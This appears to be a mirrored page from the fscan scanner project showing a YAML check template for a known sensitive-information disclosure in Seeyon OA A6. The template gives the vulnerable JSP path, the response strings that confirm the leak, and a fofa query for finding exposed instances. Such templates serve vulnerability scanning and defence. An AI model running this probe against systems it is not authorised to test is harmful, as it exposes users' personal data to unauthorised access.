mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-22 03:10:42 +08:00
26 lines
623 B
YAML
26 lines
623 B
YAML
id: seeyon-initdataaccess-disclosure
|
|
|
|
info:
|
|
name: 致远OA A6 initDataAssess.jsp 用户敏感信息泄露
|
|
author: zan8in
|
|
severity: high
|
|
verified: false
|
|
description: |
|
|
致远OA A6 initDataAssess.jsp 用户敏感信息泄露
|
|
fofa: app="致远OA-A6"
|
|
tags: seeyon,disclosure
|
|
created: 2025/03/13
|
|
requires: [seeyon]
|
|
requires-mode: opportunistic
|
|
|
|
rules:
|
|
r0:
|
|
request:
|
|
method: GET
|
|
path: /yyoa/assess/js/initDataAssess.jsp
|
|
expression: |
|
|
response.status == 200 &&
|
|
response.body.bcontains(b'personList') &&
|
|
response.body.bcontains(b'personHash.Add')
|
|
expression: r0()
|